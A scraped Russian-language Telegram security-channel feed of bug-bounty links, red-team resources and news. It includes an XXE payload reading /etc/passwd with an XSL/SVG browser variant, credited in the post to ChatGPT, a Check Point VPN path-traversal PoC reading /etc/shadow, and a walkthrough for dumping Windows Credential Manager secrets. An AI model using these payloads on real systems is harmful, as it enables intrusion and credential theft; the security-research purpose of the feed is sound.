Forwarded from #bugbountytips
1. Change Any User Data on NFT Marketplace (Crosea IO)
2. Hubspot Full Account Takeover in Bug Bounty
3. Web Cache Deception Attack on 404 page exposing PII data to unauth users
4. From Zero to Hero Intel DCM SQL Injection to RCE (CVE-2022-21225)
5. From Recon via Censys and DNSDumpster to getting P1
6. CRLF (GBK encoding) to XSS - Microsoft Bug Bounty 6000$
7. Abusing Hop-by-hop header CRLF injection
8. Exploiting non-cloud SSRF for fun & profit
9. 2 RCE in EPAM Bug Bounty Program
10. Три SQL инъекции всего за 10 минут
11. Как раскрутить RCE в чат-боте
12. Три забавных истории из Багбаунти
13. 10 способов отрепортить ерунду и получить за это деньги
14. 10 типов уязвимостей за которые все забывают
15. Как тестировать вебкэш на наличие уязвимостей
#bugbountytips
2. Hubspot Full Account Takeover in Bug Bounty
3. Web Cache Deception Attack on 404 page exposing PII data to unauth users
4. From Zero to Hero Intel DCM SQL Injection to RCE (CVE-2022-21225)
5. From Recon via Censys and DNSDumpster to getting P1
6. CRLF (GBK encoding) to XSS - Microsoft Bug Bounty 6000$
7. Abusing Hop-by-hop header CRLF injection
8. Exploiting non-cloud SSRF for fun & profit
9. 2 RCE in EPAM Bug Bounty Program
10. Три SQL инъекции всего за 10 минут
11. Как раскрутить RCE в чат-боте
12. Три забавных истории из Багбаунти
13. 10 способов отрепортить ерунду и получить за это деньги
14. 10 типов уязвимостей за которые все забывают
15. Как тестировать вебкэш на наличие уязвимостей
#bugbountytips
👎11❤🔥2🤔2❤1🌚1🗿1
(Пока не контентик который обещал, т.к. похоже что плотно занят месяца два в оффлайне)
Game of active directory with active Elastic SIEM
https://youtube.com/playlist?list=PLyJqGMYm0vnNcwX1_jT_c6R7EaA0EqJHO
Game of active directory with active Elastic SIEM
https://youtube.com/playlist?list=PLyJqGMYm0vnNcwX1_jT_c6R7EaA0EqJHO
🥱2
#Beacon
(Пока не контентик который обещал, т.к. похоже что плотно занят месяца два в оффлайне) Game of active directory with active Elastic SIEM https://youtube.com/playlist?list=PLyJqGMYm0vnNcwX1_jT_c6R7EaA0EqJHO
Чел здесь "обошел" ав, однако не смог запустить даже бладхаунд, поэтому выключил на этом компе siem через админскую панель, топ рофл (современные байпасы ав такие современные)
🥱5👌2🗿2
Forwarded from Cybred
ChatGPT помог заработать $28 000 на 0-day.
Базовый XXE-пейлоад выглядит как-то так
Можно залить файл с таким содержимым на сервер и, если у либы, которая его распарсит, включена поддержка внешних сущностей, на выходе мы получим содержимое
Это касается библиотек, но не браузеров. Если вы откроете нечто подобное у себя в Chrome, то ничего не сработает, т.к. в нем
Но выяснился забавный факт.
Помимо XML, современные браузеры поддерживают еще много форматов, например, XSL. Это старая спека, которая является надстройкой над XML со своими директивами.
О нем и о том, что там тоже можно объявлять внешние сущности, почему-то все забыли, но напомнил ChatGPT. Он подсказал, что это можно делать с помощью директивы, вроде
которая подгрузит содержимое, вопреки всем запретам.
Поэтому полная цепочка выглядит так:
1. Создаем XSL пейлоад с функцией
2. Импортируем полученное содержимое как внешнюю сущность в
3. Готовый XML-пейлоад вставляем в SVG-картинку и используем по назначению ;)
💰 Выплаты
Apple (CVE-2023-40415):
Google (CVE-2023-4357):
Базовый XXE-пейлоад выглядит как-то так
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>Можно залить файл с таким содержимым на сервер и, если у либы, которая его распарсит, включена поддержка внешних сущностей, на выходе мы получим содержимое
/etc/passwd.Это касается библиотек, но не браузеров. Если вы откроете нечто подобное у себя в Chrome, то ничего не сработает, т.к. в нем
external entities отключены по дефолту.Но выяснился забавный факт.
Помимо XML, современные браузеры поддерживают еще много форматов, например, XSL. Это старая спека, которая является надстройкой над XML со своими директивами.
О нем и о том, что там тоже можно объявлять внешние сущности, почему-то все забыли, но напомнил ChatGPT. Он подсказал, что это можно делать с помощью директивы, вроде
<xsl:copy-of select="document('file:///etc/passwd')"/>которая подгрузит содержимое, вопреки всем запретам.
Поэтому полная цепочка выглядит так:
1. Создаем XSL пейлоад с функцией
document()2. Импортируем полученное содержимое как внешнюю сущность в
XML3. Готовый XML-пейлоад вставляем в SVG-картинку и используем по назначению ;)
💰 Выплаты
Apple (CVE-2023-40415):
$25 000Google (CVE-2023-4357):
$3 000Forwarded from Пост Лукацкого
Помните вебинар "Вас взломали? Чеклист первоочередных действий", запись которого я уже выкладывал? Мы дооформили сам чеклист ✔️ и включили его в виде распечатанных листов формата А4 в свежий номер Positive Research. Ну а те, кто пока не смог получить свой персональный экземпляр нашего журнала, могут скачать чеклист в электронном виде 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
👌1
Forwarded from Proxy Bar
Трансмутация вредоносного ПО - Раскрытие скрытых следов кровавой алхимии.
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием
В октябре 2023 года BloodAlchemy была названа
*
Link
#malware #rat
*
Интересный writeup.
Рассматривается анализ вредоносного ПО под названием
«BloodAlchemy», которое наблюдали в ходе атаки.В октябре 2023 года BloodAlchemy была названа
Elastic Security Lab 1 новым RATником. Однако расследование показало, что BloodAlchemy — это НЕ совершенно новая вредоносная программа, а развитая версия Deed RAT, преемника ShadowPad.*
Link
#malware #rat
Forwarded from SHADOW:Group
В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.
Ссылка на статью
#web #rce #struts
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Как был найден RCE в одной из публичных программ на Bugcrowd
Всем привет, cегодня я расскажу, как получил RCE на одной из публичных программ Bugcrowd. Выбирая программу для взлома, я всегда обращаю внимание на программы с широким скоупом, так как они дают мне большую свободу для поиска активов, которые соответствуют…
Forwarded from Magama Bazarov
Всем привет, рад представить свою новую статью, на этот раз обнаружение атак на Active Directory. В этой статье я разобрал детекты следующих атак:
LLMNR/NBT-NS Poisoning
IPv6 Takeover
LDAP Enumeration & Bruteforce
DCSync
AS-REP Roasting
Kerberos User Enumeration & Bruteforce
https://blog.exploit.org/caster-ifyouhadnt
LLMNR/NBT-NS Poisoning
IPv6 Takeover
LDAP Enumeration & Bruteforce
DCSync
AS-REP Roasting
Kerberos User Enumeration & Bruteforce
https://blog.exploit.org/caster-ifyouhadnt
exploit.org
If You Hadn't: Detecting Active Directory Attacks with Suricata
In this article, Caster will demonstrate the capabilities of Suricata signatures to detect attacks against Active Directory.
😡3🤨1
Forwarded from Proxy Bar
CVE-2024-2961 - тихоходка
*
Помните месяц назад был кипишь, относительно того что нашли дырку в
Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает
*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
*
Помните месяц назад был кипишь, относительно того что нашли дырку в
glibc. Тогда многие хостеры еще напряглись. Но так как в широкий паблик ничего не уплыло, все успокоились.
А ресёрчеры не успокоились, слишком вкусно пахло перспективным сплоитом.
Ну так вот, на сцену вползает
Iconv со своим RCE.*
Сегодня вышел отличный WriteUp (первая часть из трёх), который раскрывает только часть потенциала дыры 2961
*
Читаем
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine
Классика - mind map по редтиму. Много нюансов есть конечно, но если идти по гайду - хороший шанс сломать сетку. https://github.com/esidate/pentesting-active-directory/blob/main/v2/pentesting_active_directory.svg
GitHub
pentesting-active-directory/v2/pentesting_active_directory.svg at main · esidate/pentesting-active-directory
Active Directory pentesting mind map. Contribute to esidate/pentesting-active-directory development by creating an account on GitHub.
Forwarded from C.I.T. Security
Гражданин России, обвиняемый в разработке хакерского инструмента NLBrute, впервые предстал перед судом на этой неделе во Флориде за использования инструмента «для создания криминальной империи». Панкову грозит до 47 лет тюремного заключения за мошенничество и компьютерные преступления.
#NLBrute, #криминальнаяимперия, #Панков @SecLabNews
#NLBrute, #криминальнаяимперия, #Панков @SecLabNews
SecurityLab.ru
Россиянину грозит 47 лет тюрьмы в США за создание вредоносного ПО NLBrute
В период с 2016 по 2019 год хакер продавал учетные данные систем по всему миру, украденные с помощью NLBrute.
Forwarded from Proxy Bar
CVE-2024-24919
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
#0day #checkpoint
*
Check Point Remote Access VPN 0-Day
*
FOFA link
*
POC:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow#0day #checkpoint
Пока без уникального контента, шо поделаешь, у админа экзамены, 2 высших образования получает🤒
❤3
Forwarded from RedTeam brazzers (Миша)
Продолжаем тему с извлечением учетных данных без взаимодействия с LSASS. Знали ли вы, что в системе Windows присутствует привилегия, которая позволяет извлекать учетные данные в открытом виде?
И имя её:SeTrustedCredmanAccessPrivilege
Если открыть документацию MSDN, то там написано, что эта привилегия позволяет:
То есть, получать доступ к Credential Manager. Казалось бы, зачем нам эта привилегия, если учетные данные из Credential Manager можно извлекать и просто путем злоупотребления DPAPI? Однако, не все так просто. Для добавления данных в Credential Manager используется API CredWrite() . Учетные данные чаще всего пушатся как
На этот тип данных распространяется небольшое ограничение: LSASS не дает извлекать поле
Так вот, привилегия
С помощью этой привилегии у нас появляется возможность обращаться к API
Подробнее об этом прекрасном механизме написано тут , а вот некоторые POCи, которые осуществляют автоматическое извлечение:
- https://github.com/leftp/BackupCreds
- https://github.com/jsecu/CredManBOF/blob/main/CredMan.c
Помните, что необязательно иметь эту привилегию, ведь мы можем динамически ее навесить на токен процесса и все равно сдампить креды. В таком случае флоу атаки следующий: берем ЛА -> добавляем в токен
И имя её:
Если открыть документацию MSDN, то там написано, что эта привилегия позволяет:
Access Credential Manager as a trusted caller
То есть, получать доступ к Credential Manager. Казалось бы, зачем нам эта привилегия, если учетные данные из Credential Manager можно извлекать и просто путем злоупотребления DPAPI? Однако, не все так просто. Для добавления данных в Credential Manager используется API CredWrite() . Учетные данные чаще всего пушатся как
CRED_TYPE_DOMAIN_PASSWORD. На этот тип данных распространяется небольшое ограничение: LSASS не дает извлекать поле
CredentialBlob, содержащее учетные данные, если они были добавлены как CRED_TYPE_DOMAIN_PASSWORD . Буквально, поле CredentialBlob, которое можно получить через функцию CredRead() или CredEnumerate(), будет пустым.Так вот, привилегия
SeTrustedCredmanAccessPrivilege позволяет обходить это ограничение и извлекать учетные данные в чистом виде.С помощью этой привилегии у нас появляется возможность обращаться к API
CredBackupCredentials() и дампить учетные данные. Данные будут записаны в файл, который возможно расшифровать через DPAPI и получить доступ к паролям.Подробнее об этом прекрасном механизме написано тут , а вот некоторые POCи, которые осуществляют автоматическое извлечение:
- https://github.com/leftp/BackupCreds
- https://github.com/jsecu/CredManBOF/blob/main/CredMan.c
Помните, что необязательно иметь эту привилегию, ведь мы можем динамически ее навесить на токен процесса и все равно сдампить креды. В таком случае флоу атаки следующий: берем ЛА -> добавляем в токен
SeTrustedCredmanAccessPrivilege -> обращаемся к API -> получаем креды🤯2❤1🤩1